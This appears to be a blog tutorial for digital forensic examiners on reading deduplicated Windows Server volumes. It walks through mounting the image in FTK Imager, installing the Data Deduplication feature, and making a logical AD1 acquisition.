1. Install Server 2016
If you have a valid Server 2016 license or access to an MSDN subscription then you can acquire the ISO from those sources. I'll also point out that Microsoft make evaluation copies of both Server 2016 and 2012 available for 180 day evaluations. These can be accessed here, however whether this is a legitimate use per the evaluation license agreement is for you to decide or seek advice on, IANAL.

Whether you are using physical hardware or a Type 1/ Type 2 Hypervisor the install process is essentially the same. Install the OS and when prompted select Windows Server 2016 Standard (Desktop Experience), the 'Desktop Experience' is required to use FTK Imager to mount drives (unless I am mistaken, I don't believe this can be achieved on the command line) and makes testing files easier. If you find you have accidentally installed Server 2016 core (without the GUI), as *may* have happened to me more than once during testing then the below instructions were helpful:

Installing the GUI for Server 2016
Installing the GUI for Server 2012

2. Mount the volume containing deduplicated data using FTK Imager
Once you have logged into your newly created Server 2016 analysis machine you can then mount the drive in the manner of your choosing  I will detail the method using FTK Imager lite however Mount Image Pro or OSFMount will work equally well.

FTK Imager Lite is sufficient for our purposes, and can be downloaded from the Access Data website here.

Once launched the Mount Image to Drive window, can be accessed via selecting File > Image Mounting or via selecting the Image Mounting icon icon in the Toolbar.

FTK Imager Image Mounting Icon

Populate the "Image File:" field with path to your Image/VMDK/VHD file, or browse to where it is located by clicking the button labelled '...'. Whether you are mounting a full physical image, a logical volume image or a VHD etc, the remaining fields will be automatically populated. In this instance the default settings will suffice so you can go ahead and select mount.

Mount Image to Drive window

The Mapped Image list will now populate with the drive letters assigned to the partition(s) within the image file. Take a note of the drive letter which has been assigned to the volume you are interested and select Close.

Image Mounted with FTK Imager Lite

Within Windows explorer you will now be able to browse the mounted image however deduplicated data will still be inaccessible, this is because Data Deduplication is not installed by default for our fresh install of Server 2012 or 2016.

3. Install Data Deduplication
The Data Deduplication Feature can be installed via PowerShell with ease, however GUI instructions follow if preferred.

To install the feature, launch a PowerShell console and type:

Install-WindowsFeature -Name FS-Data-Deduplication

Hit Enter to execute the command and the Data Deduplication feature will now install, no restart will be required. Thereafter you can revisit the mounted volume and you will note that the previously inaccessible files can now be accessed.

If you prefer to do this without having to deal with PowerShell this can be achieved using the Add Roles and Features Wizard.

Launch Server Manager, select Local Server and scroll down until you see Roles and Features:

Roles and Features within Server Manager

Clicking the Tasks button will bring up a dropdown menu where you can select Add Roles and Features:

Add Roles and Features in Tasks drop down

Select Next to skip past 'Before you Begin' , then again to retain the default installation type as "Role-Based or feature-based installation" and a third time to keep the default server selection as your new local server.

Under Server Roles > File and Storage Services > File and iSCSI Services you will find the checkbox for Data Deduplication

Select the Data Deduplication checkbox to add the feature and and you will receive a notification, per the below screenshot, that the 'File Server' feature requires installing as it is a dependency:

Add Roles and Features Wizard warning

Select Add Features

Select Next

Select Install

The Data Deduplication feature will now install and no restart will be required. Thereafter you can revisit the mounted volume and you will note that the previously inaccessible files can now be accessed.

4. Acquire data
If you do not need to acquire the data but rather perform processing and parsing activities you can stop here. The mounted drive can be used for AV scans, Bulk Extractor runs etc, as long as the process you wish to undertake performs Physical Name Querying to access the active files.

If however you need to acquire copies of the files for analysis in forensic tools, or to process by some other means then you may wish to capture an logical acquisition of the files themselves into an AD1 or similar. Once again FTK Imager Lite is sufficient for our purposes, and the steps are outlined below:

If FTK Imager was used to mount the drive then it should still be running. If not then launch FTK Imager.

Once launched the process to acquire the active files to a logical container is to select File > Image Mounting or via selecting the 'Create Disk Image' icon in the Toolbar.

Create Disk Image Icon

Select the Contents of a Folder evidence type. You will likely get a Warning message, which you can ignore and select Yes to continue.

Select Browse and navigate tot he root of the mounted drive, remembering the drive letter as assigned when we mounted the volume. Per the below screenshot this is 'H:\'. Note: If you only wish to perform a targeted collection of a limited number of files a more direct path can be entered or browsed to.

Select Finish

Within the 'Create Image' window, select Add...

Populate the case information as you require and select Next >

This will bring you to the 'Select Image Destination' Dialog box where you can Enter or Browse to a destination path for your AD1 (USB media or network location recommended).

The other settings can be left at default, select Finish and you will return to the Create Image Dialog window.

Select Start to initiate the logical acquisition. Once complete you will have an AD1 container which contained logical copies of the active files with their metadata preserved. Make sure to check the log for errors. If you attempt to perform a logical acquisition without enabling data deduplication or from a system which does not support dedupe the job will fail and the error log will look as below, showing that the files could not be accessed:

FTK Image Summary with errors

Other Options

The above methodology is my preferred approach when accessing volumes with Data Deduplication enabled, however minor modifications to the methodology may suit others better. Some modifications to consider include:

Presenting the VMDK or VHD to a Virtual server as a read only device.
If your source evidence is provided as a virtual disk then an alternative to mounting the image with software is to attach the disk to your virtual Server 2016/2012 instance via the Hypervisor. This may provide a performance improvement but is slightly more involved than using FTK Imager (or similar). There are also risks of accidentally adding the device as Read/Write so this should never be performed on original evidence.

Virtualise the source server
Personally, I have limited experience in visualizing images for review, it used to be an occasional requirement when attempting to access proprietary finance systems for insolvency matters. The last time I did this was some years ago when Live View was king and no doubt things have moved on. Some forensics shops appear to use image virtualization heavily and this technique may be useful in handling data deduplication where access to a legitimate Windows Server 2012/2016 license is not feasible. Booting a copy of the original imaged server and then using that to review or acquiring a logical copy of the data contained in a data deduplicated volume should work in theory.

Hopefully the above is useful to anyone who finds themselves up against the same issue. If you get this far and it's been helpful please let me know by leaving a comment or fire me a tweet. Comments, criticism and corrections all welcome too.